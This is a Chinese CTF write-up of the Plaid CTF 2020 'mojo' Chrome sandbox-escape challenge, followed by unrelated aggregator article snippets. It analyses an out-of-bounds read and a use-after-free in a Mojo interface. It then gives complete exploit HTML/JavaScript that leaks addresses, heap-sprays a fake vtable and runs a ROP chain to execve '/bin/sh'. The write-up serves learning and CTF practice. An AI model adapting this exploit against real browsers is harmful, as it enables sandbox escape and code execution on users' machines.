Chrome 沙箱逃逸 -- Plaid CTF 2020 mojo

文章目录

  • 前置知识
  • 参考文章
  • 环境搭建
    • 题目环境
    • 调试环境
  • 题目分析
    • 附件分析
    • 漏洞分析
      • OOB
      • UAF
  • 漏洞利用
  • 总结

前置知识

Mojo & Services 简介
chromium mojo 快速入门
Mojo docs
Intro to Mojo & Services

  • 译文:利用Mojo IPC的UAF漏洞实现Chrome浏览器沙箱逃逸
  • 原文:Cleanly Escaping the Chrome Sandbox

参考文章

本文主要参考 Plaid CTF 2020 mojo Writeup

环境搭建

题目环境

给了 docker 环境,所以直接启 docker 即可。

安装 docker

sudo snap install docker

运行 run.sh 脚本:

./run.sh

运行 chrome

./chrome --disable-gpu --remote-debugging-port=1338 --enable-blink-features=MojoJS,MojoJSTest url

调试环境

这里单独启一个 web 服务:

python3 -m http.server 8000

调试脚本:

# gdbinit
# 读取符号
file ./chrome
# 设置启动参数
set args --disable-gpu --remote-debugging-port=1338 --user-data-dir=./userdata --enable-blink-features=MojoJS url
# 设置执行fork后继续调试父进程
set follow-fork-mode parent

然后 gdb 调试即可:

gdb -x gdbinit

题目分析

附件分析

题目新定义了一个 PlaidStore 接口:

module blink.mojom;

// This interface provides a data store
interface PlaidStore {

  // Stores data in the data store
  StoreData(string key, array<uint8> data);

  // Gets data from the data store
  GetData(string key, uint32 count) => (array<uint8> data);
};

该接口定义了两个方法 StoreDataGetData 分别用于向 data store 中存储数据和获取数据。

然后在浏览器端实现 PlaidStore 接口:

namespace content {

class RenderFrameHost;

class PlaidStoreImpl : public blink::mojom::PlaidStore {
 public:
  explicit PlaidStoreImpl(RenderFrameHost *render_frame_host);

  static void Create(
      RenderFrameHost* render_frame_host,
      mojo::PendingReceiver<blink::mojom::PlaidStore> receiver);

  ~PlaidStoreImpl() override;

  // PlaidStore overrides:
  void StoreData(
      const std::string &key,
      const std::vector<uint8_t> &data) override;

  void GetData(
      const std::string &key,
      uint32_t count,
      GetDataCallback callback) override;

 private:
  RenderFrameHost* render_frame_host_;
  std::map<std::string, std::vector<uint8_t> > data_store_;
};

}

可以看到这里存在两个私有变量其中一个是 data_store_,这个好理解,其就是用来存储数据的;这里的 render_frame_host_ 是神马东西呢?

render 进程中的每一个 frame 都在 browser 进程中对应一个 RenderFrameHost,很多由浏览器提供的 mojo 接口就是通过 RenderFrameHoset 获取的。在 RenderFrameHost 初始化阶段,会在 BinderMap 中填充所有公开的 mojo 接口:

@@ -660,6 +662,10 @@ void PopulateFrameBinders(RenderFrameHostImpl* host,
   map->Add<blink::mojom::SerialService>(base::BindRepeating(
       &RenderFrameHostImpl::BindSerialService, base::Unretained(host)));
 #endif  // !defined(OS_ANDROID)
+
+  map->Add<blink::mojom::PlaidStore>(
+      base::BindRepeating(&RenderFrameHostImpl::CreatePlaidStore,
+                          base::Unretained(host)));
 }

当一个 render frame 请求该接口时,在 BinderMap 中关联的回调函数 RenderFrameHostImpl::CreatePlaidStore 就会被调用,其定义如下:

void RenderFrameHostImpl::CreatePlaidStore(
    mojo::PendingReceiver<blink::mojom::PlaidStore> receiver) {
  PlaidStoreImpl::Create(this, std::move(receiver));
}

其直接调用了 PlaidStoreImpl::Create 函数:

// static
void PlaidStoreImpl::Create(
    RenderFrameHost *render_frame_host,
    mojo::PendingReceiver<blink::mojom::PlaidStore> receiver) {
  mojo::MakeSelfOwnedReceiver(std::make_unique<PlaidStoreImpl>(render_frame_host),
                              std::move(receiver));
}

通过该函数,一个 PlaidStoreImpl 就被创建,并且该 PendingReceiver 与一个 SelfOwnedReceiver 绑定。

漏洞分析

该题存在两个漏洞,分别是 OOBUAF,接下来直接分别讲解。

OOB

来分析下存取数据的操作:

void PlaidStoreImpl::StoreData(
    const std::string &key,
    const std::vector<uint8_t> &data) {
  if (!render_frame_host_->IsRenderFrameLive()) {
    return;
  }
  data_store_[key] = data;
}

void PlaidStoreImpl::GetData(
    const std::string &key,
    uint32_t count,
    GetDataCallback callback) {
  if (!render_frame_host_->IsRenderFrameLive()) {
    std::move(callback).Run({});
    return;
  }
  auto it = data_store_.find(key);
  if (it == data_store_.end()) {
    std::move(callback).Run({});
    return;
  }
  std::vector<uint8_t> result(it->second.begin(), it->second.begin() + count);
  std::move(callback).Run(result);
}

可以看到两个操作都会先调用 render_frame_host_->IsRenderFrameLive 去检查 render frame 是否处于 live 状态。然后 StoreData 没啥问题,主要在于 GetData 函数没有对 count 字段做检查,所以这里可以导致越界读。

UAF

这里主要涉及到对象指针生命周期的问题。

在上面我们说过当一个 render frame 请求该接口时,在 BinderMap 中关联的回调函数 RenderFrameHostImpl::CreatePlaidStore 就会被调用,其最后会调用到 PlaidStoreImpl::Create 函数:

void PlaidStoreImpl::Create(
    RenderFrameHost *render_frame_host,
    mojo::PendingReceiver<blink::mojom::PlaidStore> receiver) {
  mojo::MakeSelfOwnedReceiver(std::make_unique<PlaidStoreImpl>(render_frame_host),
                              std::move(receiver));
}

通过该函数,一个 PlaidStoreImpl 就被创建,并且该 PendingReceiver 与一个 SelfOwnedReceiver 绑定,也就是说这里会将消息管道的一段 receiverPlaidStoreImpl 绑定,而这里传入的 render_frame_host 是一个 PlaidStoreImpl 类型的智能指针。

由于这里的绑定,所以当 mojo 管道关闭或发生错误时,PlaidStoreImpl 就会被自动释放,从而使得 PlaidStoreImplreceiver 的生命周期保持一致,这其实是不存在问题的。

而在 PlaidStoreImpl 的构造函数中,存在对 render_frame_host 的赋值操作:

PlaidStoreImpl::PlaidStoreImpl(
    RenderFrameHost *render_frame_host)
    : render_frame_host_(render_frame_host) {}

可以看到在 PlaidStoreImpl 的构造函数中,将 render_frame_host 赋给了其私有属性 render_frame_host_。那么问题就来了,如果 render_frame_host 对象被析构了(比如删除 iframe),但是 PlaidStoreImpl 还存在(因为 render_frame_host 并没有与 PlaidStoreImpl 绑定),那么在 StoreData/GetData 中调用 render_frame_host_->IsRenderFrameLive() 就会存在 UAF 漏洞。

漏洞利用

整体是思路就比较明确了:

  • 利用 OOB 泄漏相关数据
  • 利用 UAF 劫持程序执行流

前期准备
调用 MojoJS 接口时,请包含以下 JS 文件(这里请根据具体题目路径进行包含):

<script src="mojo/public/js/mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>

然后进行管道端点绑定:

// 方案一
var ps = blink.mojom.PlaidStore.getRemote(true);
// 方案二
var ps = new blink.mojom.PlaidStorePtr(); // 获取 PlaidStore 实例
var name = blink.mojom.PlaidStore.name; // 获取 InterfaceName
var rq = mojo.makeRequest(ps);
Mojo.bindInterface(name, re.handle, "context", true);

调试分析
OOB 泄漏数据
首先是测试 OOB,主要是看下能够泄漏什么数据:

<html>
        <script src="mojo/public/js/mojo_bindings.js"></script>
        <script src="third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
        <script>

                function hexx(str, v) {
                        console.log("\033[32m[+] " + str + "\033[0m0x" + v.toString(16));
                }

                async function pwn() {
                        console.log("PWN");
                        //var ps = blink.mojom.PlaidStore.getRemote(true); // 这种方式断点断不下来???
                        var ps = new blink.mojom.PlaidStorePtr();
                        Mojo.bindInterface(blink.mojom.PlaidStore.name,
                                                mojo.makeRequest(ps).handle,
                                                "context", true);

                        await(ps.storeData("pwn", new Uint8Array(0x10).fill(0x41)));
                        var leak_data = (await(ps.getData("pwn", 0x20))).data;
                        var u8 = new Uint8Array(leak_data);
                        var u64 = new BigInt64Array(u8.buffer);
                }
                pwn();
        </script>
</html>

将断点打在 PlaidStoreImpl::Create 函数上,主要就是看下 PlaidStoreImpl 申请的空间:
在这里插入图片描述
可以看到这里 PlaidStoreImpl 的空间大小为 0x28,其成员依次往下为 vtablerender_frame_hostdata_store_
在这里插入图片描述
StoreData 执行完后:
在这里插入图片描述
可以看到,这里 PlaidStoreImpldata_store_data_vector 位于同一个段,所以这里可以通过越界读泄漏 PlaidStoreImplvtable 地址,并且还可以泄漏 render_frame_host_ 的地址,然后通过这些地址泄漏其它地址。比如可以通过 vtable 的地址确定 ELF 加载基地址:
在这里插入图片描述
泄漏了 ELF 基地址后,就可以得到很多有用的 gadget 了。

UAF 劫持程序执行流
有了 gadget 后,接下来就是考虑如何劫持 rip,这里的想法就是劫持虚表指针从而劫持程序执行流。

我们知道,每次调用 StoreData/GetData 时,都会先调用 render_frame_host_->IsRenderFrameLive,其是通过虚表指针进行调用的:
在这里插入图片描述
可以看到这里的 rax 就是 render_frame_host_ 的虚表地址,然后 [rax + 0x160] 就是 IsRenderFrameLive 函数的地址。

可以简单验证一下,可以看到当执行 call QWORD PTR[rax+0x160] 时,rax 确实是 render_frame_host_ 的虚表地址:
在这里插入图片描述
那么整个思路就比较清晰了:

  • 构造 render_frame_host_ UAF
  • 堆喷获取 UAF 堆块并伪造 render_frame_host_ 虚表
  • 调用 render_frame_host_->IsRenderFrameLive 控制程序执行流

这里 rax 寄存器的值就是 render_frame_host_ 的虚表地址,而其虚表地址我们是可控的(就在 render_frame_host_ 对象的头 8 字节处),而在 OOB 中我们又可以顺带泄漏 render_frame_host_ 的地址(其就在 PlaidStoreImpl 虚表的下方),所以我们可以利用 xchg rax, rspgadget 劫持栈到 render_frame_host_ 上,并提前在 render_frame_host_ 上布置好 rop chain 即可。

这里借用上述参考文章中佬的一张图:
在这里插入图片描述

在布局 gadget 前还有一个问题:我们该如何在释放 render_frame_host_ 所指向的内存之后,再将这块内存分配回来?这里有个小知识点,chrome 中的内存管理使用的是 TCMalloc 机制。又因为 StoreData 函数分配的vector<uint8_t>render_frame_host_ 使用的是同一个分配器,只要大量分配大小与 RenderFrameHostImpl 相等的vector,就有可能占位成功。

TCMalloc(Thread-Caching Malloc)实现了高效的多线程内存管理,用于替代系统的内存分配相关的函数 TCMalloc解密

所以我们现在得需要知道 RenderFrameHostImpl 的大小。将断点打在其构造函数 RenderFrameHostImpl::RenderFrameHostImpl 上:
在这里插入图片描述
可以看到,在执行构造函数前执行了 RenderFrameFactory::Create 函数,所以其多半就是为 RenderFrameHostImpl 分配空间的函数,重新将断点打在 RenderFrameHostFactory::Create 上:
在这里插入图片描述
所以这里多半就可以确认 RenderFrameHostImpl 的大小为 0xc28

这里照搬上述参考文章,也是比较重要的部分:
当我们创建一个 child iframe 并建立一个 PlaidStoreImpl 实例后。如果我们关闭这个 child iframe,则对应的RenderFrameHost 将会自动关闭;但与此同时,child iframe 所对应的 PlaidStoreImplbrowser 建立的 mojo 管道将会被断开。而该管道一但断开,则 PlaidStoreImpl 实例将会被析构。

因此,我们需要在关闭 child iframe 之前,将管道的 remote 端移交给 parent iframe,使得 child iframePlaidStoreImpl 实例在 iframe 关闭后仍然存活。

回想一下,正常情况下,当关闭一个 iframe 时,RenderFrameHost 将会被析构、mojo 管道将会被关闭。此时 Mojo 管道的关闭一定会带动 PlaidStoreImpl 的析构,这样就可以析构掉所有该析构的对象。

但这里却没有,因为在关闭 child iframe 前,已经将该 iframe 所持有的 Mojo 管道 Remote 端移交出去了,因此在关闭 child iframe 时将不会关闭 Mojo 管道。而 PlaidStoreImpl 的生命周期并没有与 RenderFrameHost 相关联。即 RenderFrameHost 的析构完全不影响 PlaidStoreImpl 实例的生命周期。所以,PlaidStoreImpl 实例将不会被析构。

那么,问题是,该如何移交 Mojo 管道的 remote 端呢?答案是:使用 MojoInterfaceInterceptor。该功能可以拦截来自同一进程中其他 iframeMojo.bindInterface 调用。在 child iframe 被销毁前,我们可以利用该功能将mojo 管道的一端传递给 parent iframe
以下是来自其他 exp 的相关代码,我们可以通过该代码片段来了解 MojoInterfaceInterceptor 的具体使用方式:

var kPwnInterfaceName = "pwn";

// runs in the child frame
function sendPtr() {
  var pipe = Mojo.createMessagePipe();
  // bind the InstalledAppProvider with the child rfh
  Mojo.bindInterface(blink.mojom.InstalledAppProvider.name,
    pipe.handle1, "context", true);

  // pass the endpoint handle to the parent frame
  Mojo.bindInterface(kPwnInterfaceName, pipe.handle0, "process");
}

// runs in the parent frame
function getFreedPtr() {
  return new Promise(function (resolve, reject) {
    var frame = allocateRFH(window.location.href + "#child"); // designate the child by hash

    // intercept bindInterface calls for this process to accept the handle from the child
    let interceptor = new MojoInterfaceInterceptor(kPwnInterfaceName, "process");
    interceptor.oninterfacerequest = function(e) {
      interceptor.stop();

      // bind and return the remote
      var provider_ptr = new blink.mojom.InstalledAppProviderPtr(e.handle);
      freeRFH(frame);
      resolve(provider_ptr);
    }
    interceptor.start();
  });
}

现在,我们已经解决了所有潜在的问题,UAF 的利用方式应该是这样的:

  • child iframeMojo 管道的 remote 端移交至 parent iframe,使得 Mojo 管道仍然保持连接
  • 释放 child iframe
  • 多次分配内存,使得分配到原先被释放 RenderFrameHostImpl 的内存区域
  • 写入目标数据
  • 执行 child iframe 对应的 PlaidStoreImpl::GetData 函数

不过需要注意的是,在该题中并不需要将 child iframeMojo 管道一端传递给 parent iframe 的操作。因为通过调试可知,child iframeremove 后,其所对应的 PlaidStoreImpl 实例仍然存在,并没有随着 Mojo pipe 的关闭而被析构

尚未明确具体原因,但这种情况却简化了漏洞利用的方式

最后简化后的利用方式如下:

  • 释放 child iframe
  • 多次分配内存,使得分配到原先被释放 RenderFrameHostImpl 的内存区域
  • 写入目标数据
  • 执行 child iframe 对应的 PlaidStoreImpl::GetData 函数

简单测试一下:

<html>
<head>
        <script src="mojo/public/js/mojo_bindings.js"></script>
        <script src="third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
        <script>
                async function pwn() {
                        var frame = document.createElement("iframe");
                        frame.srcdoc = `
                                <script src="mojo/public/js/mojo_bindings.js"><\/script>
                                <script src="third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"><\/script>
                                <script>
                                        var ps = new blink.mojom.PlaidStorePtr();
                                        Mojo.bindInterface(blink.mojom.PlaidStore.name,
                                                                mojo.makeRequest(ps).handle,
                                                                "context",true);
                                        ps.storeData("pwn", new Uint8Array(0x20).fill(0x41));

                                        window.ps = ps;
                                <\/script>
                        `;

                        document.body.appendChild(frame);
                        frame.contentWindow.addEventListener("DOMContentLoaded", async () => {
                                var ps = frame.contentWindow.ps;
                                if(ps == undefined || ps == 0) {
                                        throw "FAILED to load iframe";
                                }

                                var raw_buf = new ArrayBuffer(0xc28);
                                var fu8 = new Uint8Array(raw_buf).fill(0);
                                var fu64 = new BigUint64Array(raw_buf);
                                fu64[0] = 0xdeadbeefn;
                                var pps = new blink.mojom.PlaidStorePtr();
                                Mojo.bindInterface(blink.mojom.PlaidStore.name,
                                                        mojo.makeRequest(pps).handle,
                                                        "context",true);

                                document.body.removeChild(frame);
                                frame.remove();
                                for (let i = 0; i < 100; i++) {
                                        await pps.storeData("pwn" + i, fu8);
                                }
                                await ps.getData("pwn", 0);
                        });
                }
        </script>
</head>
<body onload = pwn()></body>

</html>

效果如下:
在这里插入图片描述
程序在 GetDataCrash,此时的 rax = 0xdeadbeef,符合预期。

最后的 exp 如下:

<html>
<head>
        <script src="mojo/public/js/mojo_bindings.js"></script>
        <script src="third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
        <script>
                function hexx(str, v) {
                        var elem = document.getElementById("#parentLog");
                        if(elem == undefined) {
                                elem = document.createElement("div");
                                document.body.appendChild(elem);
                        }
                        elem.innerText += '[+] ' + str + ': 0x' + v.toString(16) + '\n';
                }

                async function pwn() {
                        //var ps = blink.mojom.PlaidStore.getRemote(true);
                        var frame = document.createElement("iframe");
                        frame.srcdoc = `
        <script src="mojo/public/js/mojo_bindings.js"><\/script>
        <script src="third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"><\/script>
        <script>
                async function pwn() {
                        var ps_list = [];
                        for (let i = 0; i < 0x200; i++) {
                                let ps = new blink.mojom.PlaidStorePtr();
                                Mojo.bindInterface(blink.mojom.PlaidStore.name,
                                                        mojo.makeRequest(ps).handle,
                                                        "context", true);
                                await ps.storeData("pwn", new Uint8Array(0x20).fill(0x41));
                                ps_list.push(ps);
                        }

                        var elf_to_vtable = 0x9fb67a0n;
                        var vtable_addr = -1;
                        var render_frame_host_addr = -1;
                        for (let k = 0; k < 0x200; k++) {

                                let ps = ps_list[k];
                                let leak_data = (await ps.getData("pwn", 0x200)).data;
                                let u8 = new Uint8Array(leak_data);
                                let u64 = new BigInt64Array(u8.buffer);

                                for (let i = 0x20 / 8; i < u64.length - 1; i++) {
                                        if ((u64[i] & 0xfffn) == 0x7a0n && (u64[i] & 0xf00000000000n) == 0x500000000000n) {
                                                vtable_addr = u64[i];
                                                render_frame_host_addr = u64[i+1];
                                                break;
                                        }
                                        if (vtable_addr != -1) {
                                                break;
                                        }
                                }
                        }

                        if (vtable_addr == -1) {
                                hexx("FAILED to OOB vtable addr", -1);
                                throw "[X] FAILED to OOB vtable addr";
                        }

                        var elf_base = vtable_addr - elf_to_vtable;

                        window.ps = ps_list[0];
                        window.elf_base = elf_base;
                        window.render_frame_host_addr = render_frame_host_addr;
                }
        <\/script>
        `;
                        document.body.appendChild(frame);
                        frame.contentWindow.addEventListener("DOMContentLoaded", async () => {
                                await frame.contentWindow.pwn();
                                var ps = frame.contentWindow.ps;
                                var elf_base = frame.contentWindow.elf_base;
                                var render_frame_host_addr = frame.contentWindow.render_frame_host_addr;
                                if (ps == undefined || ps == 0) {
                                        throw "FAILED to load iframe";
                                }

                                var pop_rdi = elf_base + 0x0000000002e4630fn;
                                var pop_rsi = elf_base + 0x0000000002d278d2n;
                                var pop_rdx = elf_base + 0x0000000002e9998en;
                                var pop_rax = elf_base + 0x0000000002e651ddn;
                                var syscall = elf_base + 0x0000000002ef528dn;
                                var xchg_rax_rsp = elf_base + 0x000000000880dee8n; // xchg rax, rsp ; clc ; pop rbp ; ret

                                hexx("elf_base", elf_base);
                                hexx("render_frame_host_addr", render_frame_host_addr);
                                hexx("pop_rdi", pop_rdi);
                                hexx("pop_rsi", pop_rsi);
                                hexx("pop_rdx", pop_rdx);
                                hexx("pop_rax", pop_rax);
                                hexx("syscall", syscall);
                                hexx("xchg_rax_rsp", xchg_rax_rsp);

                                const RenderFrameHostSize = 0xc28;
                                var raw_buf = new ArrayBuffer(RenderFrameHostSize);
                                var fu8 = new Uint8Array(raw_buf).fill(0);
                                var fdv = new DataView(raw_buf);
                                var rop = new BigUint64Array(raw_buf, 0x10);

                                fdv.setBigInt64(0, render_frame_host_addr+0x10n, true);
                                fdv.setBigInt64(0x10+0x160, xchg_rax_rsp, true);
                                fdv.setBigInt64(0x10+0x160+0x8, 0x68732f6e69622fn, true);
                                rop[0] = 0xdeadbeefn; // rbp
                                rop[1] = pop_rdi;
                                rop[2] = render_frame_host_addr+0x178n;
                                rop[3] = pop_rsi;
                                rop[4] = 0n;
                                rop[5] = pop_rdx;
                                rop[6] = 0n;
                                rop[7] = pop_rax;
                                rop[8] = 59n;
                                rop[9] = syscall;

                                var pps = new blink.mojom.PlaidStorePtr();
                                Mojo.bindInterface(blink.mojom.PlaidStore.name,
                                                        mojo.makeRequest(pps).handle,
                                                        "context", true);

                                document.body.removeChild(frame);
                                frame.remove();
                                for (let i = 0; i < 100; i++) {
                                        await pps.storeData("pwn"+i, fu8);
                                }

                                await ps.getData("pwn", 0x20);
                        });
                }
        </script>
</head>
<body onload = pwn()></body>
</html>

效果如下:
在这里插入图片描述

总结

这个题目算是比较简单的沙箱逃逸了,但是还是搞了两天。主要的问题就是调试,比较奇怪的是如果 exp 中出现了一些错误,程序不会报错。比如我的 exp 最开始在赋值 BigInt 类型的数字时,忘记给 0 后面加上 n,然后 exp 就一直打不通,但是程序也不报错,所以这里发现这个 0n 问题,我就搞了一天…

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/377501.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

训练集,验证集,测试集比例

三者的区别 训练集&#xff08;train set&#xff09; —— 用于模型拟合的数据样本。验证集&#xff08;validation set&#xff09;—— 是模型训练过程中单独留出的样本集&#xff0c;它可以用于调整模型的超参数和用于对模型的能力进行初步评估。 通常用来在模型迭代训练时…

SpringMVC原理(设计原理+启动原理+工作原理)

文章目录 前言正文一、设计原理1.1 servlet生命周期简述1.2 设计原理小结 二、启动原理2.1 AbstractHandlerMethodMapping 初始化 --RequestMapping注解解析2.2 DispatcherServlet 的初始化2.3 DispatcherServlet#initHandlerMappings(...) 初始化示例说明 三、工作原理 前言 …

Open CASCADE学习|创建多段线与圆

使用Open CASCADE Technology (OCCT)库来创建和显示一些2D几何形状。 主要过程如下&#xff1a; 包含头文件&#xff1a;代码首先包含了一些必要的头文件&#xff0c;这些头文件提供了创建和显示几何形状所需的类和函数。 定义变量&#xff1a;在main函数中&#xff0c;定义…

Linux下库函数、静态库与动态库

库函数 什么是库 库是二进制文件, 是源代码文件的另一种表现形式, 是加了密的源代码; 是一些功能相近或者是相似的函数的集合体. 使用库有什么好处 提高代码的可重用性, 而且还可以提高程序的健壮性;可以减少开发者的代码开发量, 缩短开发周期. 库制作完成后, 如何给用户…

2 月 7 日算法练习- 数据结构-树状数组

树状数组 lowbit 在学习树状数组之前&#xff0c;我们需要了解lowbit操作&#xff0c;这是一种位运算操作&#xff0c;用于计算出数字的二进制表达中的最低位的1以及后面所有的0。 写法很简单&#xff1a; int lowbit&#xff08;int x&#xff09;&#xff5b;return x &am…

C#,字符串相似度的莱文斯坦距离(Levenshtein Distance)算法与源代码

一、莱文斯坦&#xff08;Levenshtein&#xff09; Vladimir I. Levenshtein 弗拉基米尔I列文施坦博士是纠错码理论的先驱&#xff0c;被称为俄罗斯编码理论之父。Levenshtein是莫斯科俄罗斯科学院Keldysh应用数学研究所的研究教授&#xff0c;他的贡献体现在消费者的日常生活中…

SERVLET过滤器

SERVLET过滤器 全球因特网用户使用不同类型的Web浏览器访问应用服务器上存储的Web应用程序。每个浏览器根据对应的Web浏览器窗口中的设置显示应用程序中的信息。Web应用程序可能会有一些客户机的Web浏览器不支持的HTML标记或功能。这种情况下,应用程序在客户机的Web浏览器中可…

Pandas文本数据处理大全:类型判断、空白字符处理、拆分与连接【第67篇—python:文本数据】

文章目录 Pandas文本数据处理大全&#xff1a;类型判断、空白字符处理、拆分与连接1. 判断文本数据类型2. 去除空白字符3. 文本数据拆分4. 文本数据连接5. 文本数据替换6. 文本数据匹配与提取7. 文本数据的大小写转换8. 文本数据的长度计算9. 文本数据的排序10. 文本数据的分组…

Spring如何扫描自定义的注解?

目录 一、Spring框架介绍 二、什么是自定义注解 三、如何扫描自定义的注解 一、Spring框架介绍 Spring框架是一个开源的Java应用程序框架&#xff0c;它提供了一种全面的编程和配置模型&#xff0c;用于构建现代化的企业级应用程序。Spring框架的核心原则是依赖注入&#x…

Tkinter教程21:Listbox列表框+OptionMenu选项菜单+Combobox下拉列表框控件的使用+绑定事件

------------★Tkinter系列教程★------------ Tkinter教程21&#xff1a;Listbox列表框OptionMenu选项菜单Combobox下拉列表框控件的使用绑定事件 Tkinter教程20&#xff1a;treeview树视图组件&#xff0c;表格数据的插入与表头排序 Python教程57&#xff1a;tkinter中如何…

【数据库】索引的使用

【数据库】索引的使用 前言出发示例创建表Explain 查看sql执行计划where 查询解析无索引有索引 where oderBy 查询解析无索引有索引 总结 前言 在数据库设计过程中&#xff0c;常需要考虑性能&#xff0c;好的设计可以大大提高sql 语句的增删改查速度。在表的创建过程中&…

IEC 104电力规约详细解读(三) - 遥信

1.功能简述 遥信&#xff0c;、即状态量&#xff0c;是为了将断路器、隔离开关、中央信号等位置信号上送到监控后台的信息。遥信信息包括&#xff1a;反应电网运行拓扑方式的位置信息。如断路器状态、隔离开关状态&#xff1b;反应一次二次设备工作状况的运行信息&#xff0c;如…

OOD分类项目训练

一、项目地址 GitHub - LooKing9218/UIOS 二、label制作 将训练、验证、测试数据的分类信息转换入.csv文件中&#xff0c;运行如下脚本即可&#xff1a; import os import csv#要读取的训练、验证、测试文件的目录&#xff0c;该文件下保存着以各个类别命名的文件夹和对应的分…

Unity SRP 管线【第十讲:SRP/URP 图形API】

Unity 封装的图形API 文章目录 Unity 封装的图形API一、 CommandBuffer 要执行的图形命令列表1. CommandBuffer 属性2. CommandBuffer 常用图形API&#xff08;方法&#xff09;(1)设置(2)获取临时纹理 GetTemporaryRT以及释放(3)设置纹理为渲染目标 SetRenderTarget(4)Command…

CV | SAM在医学影像上的模型调研【20240207更新版】

本文主要是SAM&#xff08;Segment Anything&#xff09;在医学影像上的数据集&#xff0c;模型及评估方法调研【持续更新】~ 1.开源数据集 可参考这篇【数据集 | 基于计算机视觉的医学影像处理数据集_CSDN博客】 2.算法模型 2023.04_SAM 论文&#xff1a;2018.08.05v_Segm…

MySQL数据库⑤_基本查询DQL_表的增删查改DML

目录 1. CRUD介绍 2. Create 新增 2.1 单行数据全列插入 2.2 多行数据指定列插入 2.3 插入否则更新 2.4 替换数据 3. Retrieve 查找 3.1 select 查询 3.2 where 条件 3.2.1 MySQL运算符 3.2.2 NULL的查询 3.3 order by 结果排序 3.4 limit 筛选分页结果 4. Updat…

机器学习1一knn算法

1.基础知识点介绍 曼哈顿距离一般是比欧式距离长的除非在一维空间 拐弯的就是曼哈顿距离 Knn查看前5行数据head()&#xff0c;info看空非空 查看特征对应的类型 Head()默认前5行&#xff0c;head&#xff08;3&#xff09;就是前3行数据 Unique()可以查看分类后的结果 csv的…

MongoDB部署策略

内 容 简 介 本文介绍了MongoDB数据库的优点的数据存储模式的安装部署过程。 利用MongoDB在存储海量数据上的优势&#xff0c;部署存储空间大数据。 欢迎批评指正补充 由于编者水平有限&#xff0c;所搜集资料也很有限&#xff0c;制定的规范肯定有考虑不周全、甚至完全错误…

JavaEE作业-实验三

目录 1 实验内容 2 实验要求 3 思路 4 核心代码 5 实验结果 1 实验内容 简单的线上图书交易系统的web层 2 实验要求 ①采用SpringMVC框架&#xff0c;采用REST风格 ②要求具有如下功能&#xff1a;商品分类、订单、购物车、库存 ③独立完成&#xff0c;编写实验报告 …

Linux---线程

线程概念 在一个程序里的一个执行路线就叫做线程&#xff08;thread&#xff09;。更准确的定义是&#xff1a;线程是“一个进程内部的控制序列” 一切进程至少都有一个执行线程 线程在进程内部运行&#xff0c;本质是在进程地址空间内运行 在Linux系统中&#xff0c;在CPU眼中…